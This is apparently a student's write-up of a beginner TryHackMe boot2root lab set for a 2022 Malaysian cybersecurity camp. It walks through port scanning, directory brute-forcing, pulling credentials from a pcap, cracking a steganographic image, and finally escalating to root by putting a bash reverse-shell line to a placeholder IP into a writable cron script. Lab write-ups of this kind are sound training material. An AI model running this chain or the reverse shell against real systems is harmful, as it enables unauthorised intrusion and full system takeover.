{THM} S1mple0nly b2root
MCC 2022 Assignment (Easy)
Last updated
MCC 2022 Assignment (Easy)
Last updated
Simpleonly b2root is easy dificulty boot2root machine was created by crews for Malaysia Cyber Security Camp (MCC) 2022: First Edition as an assignment using TryHackMe. You can access it here
This was a fun little box with some funny and tricky ways same as the creator :D. It was βeasyβ machine and make me notice my machine got bug where it cannot do ssh connection.
Bug detect :
debug1: expecting SSH2_MSG_KEX_DH_GEX_REPLY
Fixed with :
sudo ip li set mtu 1200 dev tun0
Let Start. Start machine and it will provide IP.
We start with an nmap, as is almost always the case. Weβll run a basic nmap, followed by a β-sV -sCβ version of the same and save it as β-oN simpleonly.txtβ
nmap -sC -sV -A ip_machine -oN Simple.txt
From nmap scan, we notice 3 port are open. Port 21 and 22 is well known that supposedly not allowed to open. From scan, port 21 accept anonymous login.
Download pcap file and analysis it
From pcap file, found credential by luck.
Next let move to port 80.
Use the credential we get from pcap file before. At it will move to main page.
Oh damn!!. It nothing here. Let move into directory scaning.
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://ipmachine
From the scanning, it show some interesting path. Let see one by one.
admin show this images.
this dictionary contain lot of possible password. Let download it
Gotcha, we notice blackcat.jpg is same image as /admin.php. let download it and scratch the meoww
I love to do some check on file type and binwalk to see either embeded file being together. For this image, is nothing just normal jpeg.
Move into crack the image to find valuable information. I use stegcracker
stegcracker blackcat.jpg complete_meowlist.txt
Yeah!!. We got some credential. Remember at scanning port, ssh port is open. Let try the credential to have it access.
BOOM!! We in. Let find user flag. Next we proceed to privilege's escalation.
From basic searching, I notice script.sh file. After checking this file, it show automation script that run by certain time. And further investigation show the shell can be modified.
Use this payload and copy into shell file. Next open netcat to listening the port.
sh -i >& /dev/tcp/IP_MACHINE/8787 0>&1
Yeah we in and get the root.
Thank YOU.